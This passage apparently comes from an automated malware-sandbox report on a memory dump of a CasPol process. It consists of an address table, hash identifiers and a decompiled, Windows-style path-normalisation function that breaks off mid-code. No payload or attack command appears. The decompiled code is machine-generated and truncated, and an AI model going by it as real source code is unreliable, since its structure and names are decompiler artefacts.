                                                                0x00422298
                                                                0x00000000
                                                                0x00000000
                                                                0x0042229e
                                                                0x004222a4
                                                                0x004222aa
                                                                0x004222b0
                                                                0x004222b6
                                                                0x004222bc
                                                                0x004222c2
                                                                0x004222c9
                                                                0x004222d5
                                                                0x004222d6
                                                                0x004222db
                                                                0x004222e1
                                                                0x004222e7
                                                                0x004222e7
                                                                0x004222e7
                                                                0x004222ed
                                                                0x00000000
                                                                0x00000000
                                                                0x004222f3
                                                                0x004222fa
                                                                0x00422300
                                                                0x0042230c
                                                                0x00422313
                                                                0x00422319
                                                                0x00000000
                                                                0x00000000
                                                                0x0042231f
                                                                0x00422329
                                                                0x0042232f
                                                                0x00422335
                                                                0x0042233c
                                                                0x0042233d
                                                                0x00422343
                                                                0x00422349
                                                                0x00422350
                                                                0x00422357
                                                                0x0042235d
                                                                0x00422363
                                                                0x00422364
                                                                0x0042236b
                                                                0x00422371
                                                                0x00422377
                                                                0x0042237d
                                                                0x00000000
                                                                0x00000000
                                                                0x00422383
                                                                0x00422389
                                                                0x0042238f
                                                                0x00422395
                                                                0x0042239b
                                                                0x0042239b
                                                                0x0042239b
                                                                0x004223a1
                                                                0x004223ad
                                                                0x004223b4
                                                                0x004223c0
                                                                0x004223cd
                                                                0x004223cf
                                                                0x004223d5
                                                                0x004223db
                                                                0x004223e1
                                                                0x00000000
                                                                0x00000000
                                                                0x004223e7
                                                                0x004223ed
                                                                0x004223f3
                                                                0x00422402
                                                                0x00422408
                                                                0x0042240f
                                                                0x00422411
                                                                0x0042241d
                                                                0x00422423
                                                                0x00422426
                                                                0x0042242c
                                                                0x00422433
                                                                0x00000000
                                                                0x00000000
                                                                0x0042243f
                                                                0x00422442
                                                                0x00422449
                                                                0x00422450
                                                                0x00422457
                                                                0x0042245e
                                                                0x0042245e
                                                                0x0042245e
                                                                0x00422464
                                                                0x00000000
                                                                0x00000000
                                                                0x0042246a
                                                                0x00422470
                                                                0x00422477
                                                                0x00422478
                                                                0x0042247d
                                                                0x00422483
                                                                0x00422488
                                                                0x00422489
                                                                0x0042248f
                                                                0x0042248f
                                                                0x0042248f
                                                                0x00422495
                                                                0x004224a2
                                                                0x004224a8
                                                                0x004224a9
                                                                0x00000000
                                                                0x00000000
                                                                0x004224af
                                                                0x004224b5
                                                                0x004224bb
                                                                0x004224bc
                                                                0x004224c2
                                                                0x004224c8
                                                                0x004224cf
                                                                0x004224db
                                                                0x004224e2
                                                                0x004224e7
                                                                0x004224ee
                                                                0x004224f1
                                                                0x004224f7
                                                                0x00000000
                                                                0x00000000
                                                                0x004224fd
                                                                0x00422503
                                                                0x0042250a
                                                                0x00422510
                                                                0x00422516
                                                                0x0042251c
                                                                0x00422521
                                                                0x00422526
                                                                0x0042252d
                                                                0x00422533
                                                                0x00422534
                                                                0x00422535
                                                                0x0042253b
                                                                0x00422542
                                                                0x00422549
                                                                0x0042254a
                                                                0x00422550
                                                                0x0042255d
                                                                0x0042255e
                                                                0x0042255f
                                                                0x00422562
                                                                0x00422569
                                                                0x0042256c
                                                                0x00422572
                                                                0x00422573
                                                                0x0042257a
                                                                0x00422584
                                                                0x0042258a
                                                                0x00422591
                                                                0x00422597
                                                                0x00422598
                                                                0x0042259e
                                                                0x0042259f
                                                                0x004225a5
                                                                0x004225af
                                                                0x004225b0
                                                                0x004225b6
                                                                0x004225b8
                                                                0x004225be
                                                                0x004225c5
                                                                0x004225cb
                                                                0x004225d1
                                                                0x004225d2
                                                                0x004225d8
                                                                0x004225df
                                                                0x004225e5
                                                                0x004225eb
                                                                0x00000000
                                                                0x00000000
                                                                0x004225fd
                                                                0x00422603
                                                                0x00422608
                                                                0x0042260f
                                                                0x00422616
                                                                0x00422617
                                                                0x0042261d
                                                                0x0042261e
                                                                0x00422624
                                                                0x00422625
                                                                0x0042262c
                                                                0x00422632
                                                                0x00422638
                                                                0x0042263f
                                                                0x00422644
                                                                0x0042264a
                                                                0x00000000
                                                                0x00000000
                                                                0x00422650
                                                                0x00422657
                                                                0x0042265f
                                                                0x00422660
                                                                0x00422661
                                                                0x00000000
                                                                0x00000000
                                                                0x00422667
                                                                0x0042266d
                                                                0x0042266e
                                                                0x00422675
                                                                0x00422676
                                                                0x0042267c
                                                                0x0042267f
                                                                0x00422686
                                                                0x00000000
                                                                0x00000000
                                                                0x0042268c
                                                                0x00422692
                                                                0x00422698
                                                                0x0042269e
                                                                0x004226a5
                                                                0x004226ab
                                                                0x004226b1
                                                                0x004226b7
                                                                0x004226bd
                                                                0x004226bd
                                                                0x004226bd
                                                                0x004226c3
                                                                0x004226c3
                                                                0x004226c9
                                                                0x004226ca
                                                                0x004226ca
                                                                0x004226ca
                                                                0x004226d0
                                                                0x004226d7
                                                                0x004226d7
                                                                0x004226dd
                                                                0x004226e3
                                                                0x004226ef
                                                                0x004226f6
                                                                0x004226fc
                                                                0x00422702
                                                                0x00422709
                                                                0x0042270a
                                                                0x00422710
                                                                0x00422716
                                                                0x00422726
                                                                0x0042272d
                                                                0x0042272e
                                                                0x00422734
                                                                0x0042273a
                                                                0x00422740
                                                                0x00000000
                                                                0x00000000
                                                                0x00422746
                                                                0x0042275b
                                                                0x00422761
                                                                0x00422761
                                                                0x00422761
                                                                0x00422767
                                                                0x00000000
                                                                0x00000000
                                                                0x0042276d
                                                                0x00422774
                                                                0x0042277a
                                                                0x00422781
                                                                0x00422787
                                                                0x0042278b
                                                                0x00422791
                                                                0x00422797
                                                                0x00422797
                                                                0x00422797
                                                                0x0042279d
                                                                0x004227a3
                                                                0x004227a9
                                                                0x004227af
                                                                0x004227b0
                                                                0x004227b6
                                                                0x004227bc
                                                                0x004227c2
                                                                0x004227c8
                                                                0x004227ce
                                                                0x004227cf
                                                                0x004227d5
                                                                0x004227d6
                                                                0x004227dc
                                                                0x004227e2
                                                                0x004227e3
                                                                0x004227e9
                                                                0x004227ef
                                                                0x004227f6
                                                                0x004227fc
                                                                0x004227fd
                                                                0x00422803
                                                                0x0042280a
                                                                0x00422810
                                                                0x00422811
                                                                0x00422817
                                                                0x00000000
                                                                0x00000000
                                                                0x0042281d
                                                                0x00422823
                                                                0x0042282a
                                                                0x0042282b
                                                                0x00422831
                                                                0x00422834
                                                                0x0042283a
                                                                0x0042283b
                                                                0x0042283c
                                                                0x00422843
                                                                0x00422846
                                                                0x0042284c
                                                                0x00422852
                                                                0x00422857
                                                                0x00422863
                                                                0x00422869
                                                                0x00422870
                                                                0x00422875
                                                                0x00422885
                                                                0x0042288b
                                                                0x00422892
                                                                0x00422893
                                                                0x00422899
                                                                0x0042289f
                                                                0x004228a6
                                                                0x004228ac
                                                                0x004228b9
                                                                0x00000000
                                                                0x00000000
                                                                0x004228bf
                                                                0x004228c6
                                                                0x004228c7

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7855a91262499e74a833819bd6a50c096e99b9d096e8417f46f47b428b0aae3
                                                                • Instruction ID: 509941d02471cfaa0b7e45a818e523af46d733f3b8c874efea17fe81caa4faa2
                                                                • Opcode Fuzzy Hash: e7855a91262499e74a833819bd6a50c096e99b9d096e8417f46f47b428b0aae3
                                                                • Instruction Fuzzy Hash: 5E32B732A08790CFD716DF38D98AA413FB1F396724B44438ED4A2971E6D7392616CF89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 95%
                                                                			E01646E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				char _v20;
                                                                				signed int _v32;
                                                                				signed short _v34;
                                                                				intOrPtr _v36;
                                                                				signed short _v38;
                                                                				signed short _v40;
                                                                				char _v41;
                                                                				signed int _v48;
                                                                				short _v50;
                                                                				signed int _v52;
                                                                				signed short _v54;
                                                                				signed int _v56;
                                                                				char _v57;
                                                                				signed int _v64;
                                                                				signed int _v68;
                                                                				signed short _v70;
                                                                				signed int _v72;
                                                                				signed int _v76;
                                                                				signed int _v80;
                                                                				signed int _v84;
                                                                				signed short _v88;
                                                                				signed int _v92;
                                                                				signed int _v96;
                                                                				signed int _v100;
                                                                				signed int _v104;
                                                                				signed int _v108;
                                                                				signed int _v112;
                                                                				unsigned int _v116;
                                                                				signed int _v120;
                                                                				signed int _v124;
                                                                				unsigned int _v128;
                                                                				char _v136;
                                                                				signed int __ebx;
                                                                				signed int __edi;
                                                                				signed int __esi;
                                                                				void* __ebp;
                                                                				signed int _t312;
                                                                				signed int _t313;
                                                                				char* _t315;
                                                                				unsigned int _t316;
                                                                				signed int _t317;
                                                                				short* _t319;
                                                                				void* _t320;
                                                                				signed int _t321;
                                                                				signed short _t327;
                                                                				signed int _t328;
                                                                				signed int _t335;
                                                                				signed short* _t336;
                                                                				signed int _t337;
                                                                				signed int _t338;
                                                                				signed int _t349;
                                                                				signed short _t352;
                                                                				signed int _t357;
                                                                				signed int _t360;
                                                                				signed int _t363;
                                                                				void* _t365;
                                                                				signed int _t366;
                                                                				signed short* _t367;
                                                                				signed int _t369;
                                                                				signed int _t375;
                                                                				signed int _t379;
                                                                				signed int _t384;
                                                                				signed int _t386;
                                                                				void* _t387;
                                                                				signed short _t389;
                                                                				intOrPtr* _t392;
                                                                				signed int _t397;
                                                                				unsigned int _t399;
                                                                				signed int _t401;
                                                                				signed int _t402;
                                                                				signed int _t407;
                                                                				void* _t415;
                                                                				signed short _t417;
                                                                				unsigned int _t418;
                                                                				signed int _t419;
                                                                				signed int _t420;
                                                                				signed int _t422;
                                                                				intOrPtr* _t433;
                                                                				signed int _t435;
                                                                				void* _t436;
                                                                				signed int _t437;
                                                                				signed int _t438;
                                                                				signed int _t440;
                                                                				signed short _t443;
                                                                				void* _t444;
                                                                				signed int _t445;
                                                                				signed int _t446;
                                                                				signed int _t449;
                                                                				signed int _t450;
                                                                				signed int _t451;
                                                                				signed int _t452;
                                                                				signed int _t453;
                                                                
                                                                				_t425 = __edx;
                                                                				_push(0xfffffffe);
                                                                				_push(0x16ffca8);
                                                                				_push(0x16717f0);
                                                                				_push( *[fs:0x0]);
                                                                				_t312 =  *0x171d360;
                                                                				_v12 = _v12 ^ _t312;
                                                                				_t313 = _t312 ^ _t453;
                                                                				_v32 = _t313;
                                                                				_push(_t313);
                                                                				 *[fs:0x0] =  &_v20;
                                                                				_v116 = __edx;
                                                                				_t443 = __ecx;
                                                                				_v88 = __ecx;
                                                                				_t386 = _a4;
                                                                				_t433 = _a8;
                                                                				_v112 = _t433;
                                                                				_t315 = _a12;
                                                                				_v64 = _t315;
                                                                				_t392 = _a16;
                                                                				_v108 = _t392;
                                                                				if(_t433 != 0) {
                                                                					 *_t433 = 0;
                                                                				}
                                                                				if(_t315 != 0) {
                                                                					 *_t315 = 0;
                                                                				}
                                                                				if(_t425 > 0xffff) {
                                                                					_v116 = 0xffff;
                                                                				}
                                                                				 *_t392 = 0;
                                                                				 *((intOrPtr*)(_t392 + 4)) = 0;
                                                                				_t316 =  *_t443 & 0x0000ffff;
                                                                				_v104 = _t316;
                                                                				_t435 = _t316 >> 1;
                                                                				_v120 = _t435;
                                                                				if(_t435 == 0) {
                                                                					L124:
                                                                					_t317 = 0;
                                                                					goto L60;
                                                                				} else {
                                                                					_t319 =  *((intOrPtr*)(_t443 + 4));
                                                                					if( *_t319 != 0) {
                                                                						_t397 = _t435;
                                                                						_t320 = _t319 + _t435 * 2;
                                                                						_t425 = _t320 - 2;
                                                                						while(_t397 != 0) {
                                                                							if( *_t425 == 0x20) {
                                                                								_t397 = _t397 - 1;
                                                                								_t425 = _t425 - 2;
                                                                								continue;
                                                                							}
                                                                							if(_t397 == 0) {
                                                                								goto L124;
                                                                							}
                                                                							_t321 =  *(_t320 - 2) & 0x0000ffff;
                                                                							if(_t321 == 0x5c || _t321 == 0x2f) {
                                                                								_v57 = 0;
                                                                							} else {
                                                                								_v57 = 1;
                                                                							}
                                                                							_t399 = _v116 >> 1;
                                                                							_v92 = _t399;
                                                                							_v128 = _t399;
                                                                							E0166FA60(_t386, 0, _v116);
                                                                							_v56 = 0;
                                                                							_v52 = 0;
                                                                							_v50 = _v92 + _v92;
                                                                							_v48 = _t386;
                                                                							_t327 = E016474C0(_t443);
                                                                							if(_t327 != 0) {
                                                                								_t389 = _t327 >> 0x10;
                                                                								_t328 = _t327 & 0x0000ffff;
                                                                								_v112 = _t328;
                                                                								_t437 = _v64;
                                                                								if(_t437 == 0) {
                                                                									L122:
                                                                									_t438 = _t328 + 8;
                                                                									_t401 = _v92;
                                                                									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
                                                                										_t209 = _t438 + 2; // 0xddeeddf0
                                                                										_t402 = _t209;
                                                                										asm("sbb eax, eax");
                                                                										_t317 =  !0xffff & _t402;
                                                                									} else {
                                                                										E01659BC6( &_v52, 0x1601080);
                                                                										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
                                                                										E01669377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
                                                                										_t317 = _t438;
                                                                									}
                                                                									goto L60;
                                                                								}
                                                                								if(_t389 != 0) {
                                                                									_t425 = _t389;
                                                                									_t335 = E016A46A7(_t443, _t389, _t437);
                                                                									if(_t335 < 0) {
                                                                										goto L124;
                                                                									}
                                                                									if( *_t437 != 0) {
                                                                										goto L124;
                                                                									}
                                                                									_t328 = _v112;
                                                                								}
                                                                								goto L122;
                                                                							} else {
                                                                								_t425 = _t443;
                                                                								_t336 =  *(_t425 + 4);
                                                                								_t407 =  *_t425 & 0x0000ffff;
                                                                								if(_t407 < 2) {
                                                                									L17:
                                                                									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
                                                                										_t337 = 5;
                                                                									} else {
                                                                										if(_t407 < 6) {
                                                                											L98:
                                                                											_t337 = 3;
                                                                											L23:
                                                                											 *_v108 = _t337;
                                                                											_t409 = 0;
                                                                											_v72 = 0;
                                                                											_v68 = 0;
                                                                											_v64 = 0;
                                                                											_v84 = 0;
                                                                											_v41 = 0;
                                                                											_t445 = 0;
                                                                											_v76 = 0;
                                                                											_v8 = 0;
                                                                											if(_t337 != 2) {
                                                                												_t338 = _t337 - 1;
                                                                												if(_t338 > 6) {
                                                                													L164:
                                                                													_t446 = 0;
                                                                													_v64 = 0;
                                                                													_t439 = _v92;
                                                                													goto L59;
                                                                												}
                                                                												switch( *((intOrPtr*)(_t338 * 4 +  &M0164749C))) {
                                                                													case 0:
                                                                														__ecx = 0;
                                                                														__eflags = 0;
                                                                														_v124 = 0;
                                                                														__esi = 2;
                                                                														while(1) {
                                                                															_v100 = __esi;
                                                                															__eflags = __esi - __edi;
                                                                															if(__esi >= __edi) {
                                                                																break;
                                                                															}
                                                                															__eax =  *(__edx + 4);
                                                                															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
                                                                															__eflags = __eax - 0x5c;
                                                                															if(__eax == 0x5c) {
                                                                																L140:
                                                                																__ecx = __ecx + 1;
                                                                																_v124 = __ecx;
                                                                																__eflags = __ecx - 2;
                                                                																if(__ecx == 2) {
                                                                																	break;
                                                                																}
                                                                																L141:
                                                                																__esi = __esi + 1;
                                                                																continue;
                                                                															}
                                                                															__eflags = __eax - 0x2f;
                                                                															if(__eax != 0x2f) {
                                                                																goto L141;
                                                                															}
                                                                															goto L140;
                                                                														}
                                                                														__eax = __esi;
                                                                														_v80 = __esi;
                                                                														__eax =  *(__edx + 4);
                                                                														_v68 =  *(__edx + 4);
                                                                														__eax = __esi + __esi;
                                                                														_v72 = __ax;
                                                                														__eax =  *(__edx + 2) & 0x0000ffff;
                                                                														_v70 = __ax;
                                                                														_v76 = __esi;
                                                                														goto L80;
                                                                													case 1:
                                                                														goto L164;
                                                                													case 2:
                                                                														__eax = E016252A5(__ecx);
                                                                														_v84 = __eax;
                                                                														_v41 = 1;
                                                                														__eflags = __eax;
                                                                														if(__eax == 0) {
                                                                															__eax =  *[fs:0x30];
                                                                															__ebx =  *(__eax + 0x10);
                                                                															__ebx =  *(__eax + 0x10) + 0x24;
                                                                														} else {
                                                                															__ebx = __eax + 0xc;
                                                                														}
                                                                														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
                                                                														__eax = L01632600( *( *(__ebx + 4)) & 0x0000ffff);
                                                                														__si = __ax;
                                                                														_v88 =  *(_v88 + 4);
                                                                														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
                                                                														__eax = L01632600( *( *(_v88 + 4)) & 0x0000ffff);
                                                                														_v54 = __ax;
                                                                														__eflags = __ax - __ax;
                                                                														if(__eflags != 0) {
                                                                															__cx = __ax;
                                                                															L016A4735(__ecx, __edx, __eflags) = 0x3d;
                                                                															_v40 = __ax;
                                                                															__si = _v54;
                                                                															_v38 = __si;
                                                                															_v36 = 0x3a;
                                                                															 &_v40 =  &_v136;
                                                                															E0166BB40(__ecx,  &_v136,  &_v40) =  &_v52;
                                                                															__eax =  &_v136;
                                                                															__eax = E01652010(__ecx, 0,  &_v136,  &_v52);
                                                                															__eflags = __eax;
                                                                															if(__eax >= 0) {
                                                                																__ax = _v52;
                                                                																_v56 = __eax;
                                                                																__edx = __ax & 0x0000ffff;
                                                                																__ecx = __edx;
                                                                																__ecx = __edx >> 1;
                                                                																_v100 = __ecx;
                                                                																__eflags = __ecx - 3;
                                                                																if(__ecx <= 3) {
                                                                																	L155:
                                                                																	__ebx = _v48;
                                                                																	L156:
                                                                																	_v72 = __ax;
                                                                																	goto L119;
                                                                																}
                                                                																__eflags = __ecx - _v92;
                                                                																if(__ecx >= _v92) {
                                                                																	goto L155;
                                                                																}
                                                                																__esi = 0x5c;
                                                                																__ebx = _v48;
                                                                																 *(__ebx + __ecx * 2) = __si;
                                                                																__eax = __edx + 2;
                                                                																_v56 = __edx + 2;
                                                                																_v52 = __ax;
                                                                																goto L156;
                                                                															}
                                                                															__eflags = __eax - 0xc0000023;
                                                                															if(__eax != 0xc0000023) {
                                                                																__eax = 0;
                                                                																_v52 = __ax;
                                                                																_v40 = __si;
                                                                																_v38 = 0x5c003a;
                                                                																_v34 = __ax;
                                                                																__edx =  &_v40;
                                                                																__ecx =  &_v52;
                                                                																L016A4658(__ecx,  &_v40) = 8;
                                                                																_v72 = __ax;
                                                                																__ebx = _v48;
                                                                																__ax = _v52;
                                                                																_v56 = 8;
                                                                																goto L119;
                                                                															}
                                                                															__ax = _v52;
                                                                															_v56 = __eax;
                                                                															__eax = __ax & 0x0000ffff;
                                                                															__eax = (__ax & 0x0000ffff) + 2;
                                                                															_v64 = __eax;
                                                                															__eflags = __eax - 0xffff;
                                                                															if(__eax <= 0xffff) {
                                                                																_v72 = __ax;
                                                                																__ebx = _v48;
                                                                																goto L119;
                                                                															}
                                                                															__esi = 0;
                                                                															_v64 = 0;
                                                                															__ebx = _v48;
                                                                															__edi = _v92;
                                                                															goto L58;
                                                                														} else {
                                                                															__eax =  *__ebx;
                                                                															_v72 =  *__ebx;
                                                                															__eax =  *(__ebx + 4);
                                                                															_v68 =  *(__ebx + 4);
                                                                															__edx =  &_v72;
                                                                															__ecx =  &_v52;
                                                                															__eax = E01659BC6(__ecx,  &_v72);
                                                                															__ebx = _v48;
                                                                															__eax = _v52 & 0x0000ffff;
                                                                															_v56 = _v52 & 0x0000ffff;
                                                                															L119:
                                                                															__eax = 3;
                                                                															_v80 = 3;
                                                                															__esi = 2;
                                                                															_v76 = 2;
                                                                															__edx = _v88;
                                                                															goto L25;
                                                                														}
                                                                													case 3:
                                                                														__eax = E016252A5(__ecx);
                                                                														_v84 = __eax;
                                                                														_v41 = 1;
                                                                														__eflags = __eax;
                                                                														if(__eax == 0) {
                                                                															__eax =  *[fs:0x30];
                                                                															__ebx =  *(__eax + 0x10);
                                                                															__ebx =  *(__eax + 0x10) + 0x24;
                                                                															__eflags = __ebx;
                                                                															__esi = _v76;
                                                                														} else {
                                                                															__ebx = __eax + 0xc;
                                                                														}
                                                                														__ecx = __ebx;
                                                                														__eax = L016283AE(__ebx);
                                                                														_v80 = __eax;
                                                                														__ecx =  *__ebx;
                                                                														_v72 =  *__ebx;
                                                                														__ecx =  *(__ebx + 4);
                                                                														_v68 = __ecx;
                                                                														__eflags = __eax - 3;
                                                                														if(__eax == 3) {
                                                                															__eax = 4;
                                                                															_v72 = __ax;
                                                                														} else {
                                                                															__ecx = __eax + __eax;
                                                                															_v72 = __cx;
                                                                														}
                                                                														goto L80;
                                                                													case 4:
                                                                														_t340 = E016252A5(0);
                                                                														_v84 = _t340;
                                                                														_v41 = 1;
                                                                														__eflags = _t340;
                                                                														if(_t340 == 0) {
                                                                															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                															_t445 = _v76;
                                                                														} else {
                                                                															_t428 = _t340 + 0xc;
                                                                															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
                                                                														}
                                                                														_v72 =  *_t428;
                                                                														_v68 = _t428[2];
                                                                														_v80 = L016283AE(_t428);
                                                                														L80:
                                                                														E01659BC6( &_v52,  &_v72);
                                                                														_t386 = _v48;
                                                                														_v56 = _v52 & 0x0000ffff;
                                                                														_t425 = _v88;
                                                                														goto L25;
                                                                													case 5:
                                                                														__eax = 4;
                                                                														_v80 = 4;
                                                                														__esi = 4;
                                                                														_v76 = 4;
                                                                														__eflags = __edi - 4;
                                                                														if(__edi < 4) {
                                                                															__esi = __edi;
                                                                															_v76 = __esi;
                                                                														}
                                                                														__eax =  *0x1601080;
                                                                														_v72 =  *0x1601080;
                                                                														__eax =  *0x1601084;
                                                                														_v68 =  *0x1601084;
                                                                														__edx =  &_v72;
                                                                														__ecx =  &_v52;
                                                                														__eax = E01659BC6(__ecx,  &_v72);
                                                                														__eax = _v52 & 0x0000ffff;
                                                                														_v56 = __eax;
                                                                														__edx = _v88;
                                                                														__ebx = _v48;
                                                                														__eflags = __eax - 6;
                                                                														if(__eax >= 6) {
                                                                															__eax =  *(__edx + 4);
                                                                															__ax =  *((intOrPtr*)(__eax + 4));
                                                                															 *(__ebx + 4) =  *((intOrPtr*)(__eax + 4));
                                                                														}
                                                                														__eax = _v108;
                                                                														__eflags =  *_v108 - 7;
                                                                														if( *_v108 == 7) {
                                                                															_v57 = 0;
                                                                														}
                                                                														goto L25;
                                                                												}
                                                                											} else {
                                                                												_v80 = 3;
                                                                												L25:
                                                                												_t349 = _v104 + (_v72 & 0x0000ffff) - _t445 + _t445;
                                                                												_v104 = _t349;
                                                                												_t415 = _t349 + 2;
                                                                												if(_t415 > _v116) {
                                                                													if(_t435 <= 1) {
                                                                														if( *( *(_t425 + 4)) != 0x2e) {
                                                                															goto L72;
                                                                														}
                                                                														if(_t435 != 1) {
                                                                															asm("sbb esi, esi");
                                                                															_t446 =  !_t445 & _v104;
                                                                															_v64 = _t446;
                                                                															_t439 = _v92;
                                                                															L58:
                                                                															_t409 = _v84;
                                                                															L59:
                                                                															_v8 = 0xfffffffe;
                                                                															E0164746D(_t386, _t409, _t439, _t446);
                                                                															_t317 = _t446;
                                                                															L60:
                                                                															 *[fs:0x0] = _v20;
                                                                															_pop(_t436);
                                                                															_pop(_t444);
                                                                															_pop(_t387);
                                                                															return E0166B640(_t317, _t387, _v32 ^ _t453, _t425, _t436, _t444);
                                                                														}
                                                                														_t417 = _v72;
                                                                														if(_t417 != 8) {
                                                                															if(_v116 >= (_t417 & 0x0000ffff)) {
                                                                																_t352 = _v56;
                                                                																_t418 = _t352 & 0x0000ffff;
                                                                																_v104 = _t418;
                                                                																_t419 = _t418 >> 1;
                                                                																_v100 = _t419;
                                                                																if(_t419 != 0) {
                                                                																	if( *((short*)(_t386 + _t419 * 2 - 2)) == 0x5c) {
                                                                																		_t352 = _v104 + 0xfffffffe;
                                                                																		_v56 = _t352;
                                                                																		_v52 = _t352;
                                                                																	}
                                                                																}
                                                                																L27:
                                                                																_t420 = 0;
                                                                																_v100 = 0;
                                                                																L28:
                                                                																L28:
                                                                																if(_t420 < (_t352 & 0x0000ffff) >> 1) {
                                                                																	goto L69;
                                                                																} else {
                                                                																	_t422 = (_v56 & 0x0000ffff) >> 1;
                                                                																	_v96 = _t422;
                                                                																}
                                                                																while(_t445 < _t435) {
                                                                																	_t363 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
                                                                																	if(_t363 == 0x5c) {
                                                                																		L44:
                                                                																		if(_t422 == 0) {
                                                                																			L46:
                                                                																			 *(_t386 + _t422 * 2) = 0x5c;
                                                                																			_t422 = _t422 + 1;
                                                                																			_v96 = _t422;
                                                                																			L43:
                                                                																			_t445 = _t445 + 1;
                                                                																			_v76 = _t445;
                                                                																			continue;
                                                                																		}
                                                                																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
                                                                																			goto L43;
                                                                																		}
                                                                																		goto L46;
                                                                																	}
                                                                																	_t365 = _t363 - 0x2e;
                                                                																	if(_t365 == 0) {
                                                                																		_t126 = _t445 + 1; // 0x2
                                                                																		_t366 = _t126;
                                                                																		_v104 = _t366;
                                                                																		if(_t366 == _t435) {
                                                                																			goto L43;
                                                                																		}
                                                                																		_t367 =  *(_t425 + 4);
                                                                																		_t440 =  *(_t367 + 2 + _t445 * 2) & 0x0000ffff;
                                                                																		_v108 = _t440;
                                                                																		_t435 = _v120;
                                                                																		if(_t440 != 0x5c) {
                                                                																			if(_v108 == 0x2f) {
                                                                																				goto L83;
                                                                																			}
                                                                																			if(_v108 != 0x2e) {
                                                                																				L35:
                                                                																				while(_t445 < _t435) {
                                                                																					_t369 = ( *(_t425 + 4))[_t445] & 0x0000ffff;
                                                                																					if(_t369 == 0x5c || _t369 == 0x2f) {
                                                                																						if(_t445 < _t435) {
                                                                																							if(_t422 >= 2) {
                                                                																								if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x2e) {
                                                                																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
                                                                																										_t422 = _t422 - 1;
                                                                																										_v96 = _t422;
                                                                																									}
                                                                																								}
                                                                																							}
                                                                																						}
                                                                																						break;
                                                                																					} else {
                                                                																						 *(_t386 + _t422 * 2) = _t369;
                                                                																						_t422 = _t422 + 1;
                                                                																						_v96 = _t422;
                                                                																						_t445 = _t445 + 1;
                                                                																						_v76 = _t445;
                                                                																						continue;
                                                                																					}
                                                                																				}
                                                                																				_t445 = _t445 - 1;
                                                                																				_v76 = _t445;
                                                                																				goto L43;
                                                                																			}
                                                                																			_t155 = _t445 + 2; // 0x3
                                                                																			_t425 = _v88;
                                                                																			if(_t155 == _t435) {
                                                                																				while(1) {
                                                                																					L103:
                                                                																					if(_t422 < _v80) {
                                                                																						break;
                                                                																					}
                                                                																					 *(_t386 + _t422 * 2) = 0;
                                                                																					_t425 = _v88;
                                                                																					if( *(_t386 + _t422 * 2) != 0x5c) {
                                                                																						_t422 = _t422 - 1;
                                                                																						_v96 = _t422;
                                                                																						continue;
                                                                																					} else {
                                                                																						goto L105;
                                                                																					}
                                                                																					while(1) {
                                                                																						L105:
                                                                																						if(_t422 < _v80) {
                                                                																							goto L180;
                                                                																						}
                                                                																						 *(_t386 + _t422 * 2) = 0;
                                                                																						_t435 = _v120;
                                                                																						if( *(_t386 + _t422 * 2) == 0x5c) {
                                                                																							if(_t422 < _v80) {
                                                                																								goto L180;
                                                                																							}
                                                                																							L110:
                                                                																							_t445 = _t445 + 1;
                                                                																							_v76 = _t445;
                                                                																							goto L43;
                                                                																						}
                                                                																						_t422 = _t422 - 1;
                                                                																						_v96 = _t422;
                                                                																					}
                                                                																					break;
                                                                																				}
                                                                																				L180:
                                                                																				_t422 = _t422 + 1;
                                                                																				_v96 = _t422;
                                                                																				goto L110;
                                                                																			}
                                                                																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
                                                                																			if(_t375 != 0x5c) {
                                                                																				if(_t375 != 0x2f) {
                                                                																					goto L35;
                                                                																				}
                                                                																			}
                                                                																			goto L103;
                                                                																		}
                                                                																		L83:
                                                                																		_t445 = _v104;
                                                                																		_v76 = _t445;
                                                                																		goto L43;
                                                                																	}
                                                                																	if(_t365 == 1) {
                                                                																		goto L44;
                                                                																	} else {
                                                                																		goto L35;
                                                                																	}
                                                                																}
                                                                																_t449 = _v80;
                                                                																if(_v57 != 0) {
                                                                																	if(_t422 > _t449) {
                                                                																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
                                                                																			_t422 = _t422 - 1;
                                                                																			_v96 = _t422;
                                                                																		}
                                                                																	}
                                                                																}
                                                                																_t439 = _v92;
                                                                																if(_t422 >= _v92) {
                                                                																	L52:
                                                                																	if(_t422 == 0) {
                                                                																		L56:
                                                                																		_t425 = _t422 + _t422;
                                                                																		_v52 = _t425;
                                                                																		if(_v112 != 0) {
                                                                																			_t357 = _t422;
                                                                																			while(1) {
                                                                																				_v100 = _t357;
                                                                																				if(_t357 == 0) {
                                                                																					break;
                                                                																				}
                                                                																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
                                                                																					break;
                                                                																				}
                                                                																				_t357 = _t357 - 1;
                                                                																			}
                                                                																			if(_t357 >= _t422) {
                                                                																				L113:
                                                                																				 *_v112 = 0;
                                                                																				goto L57;
                                                                																			}
                                                                																			if(_t357 < _t449) {
                                                                																				goto L113;
                                                                																			}
                                                                																			 *_v112 = _t386 + _t357 * 2;
                                                                																		}
                                                                																		L57:
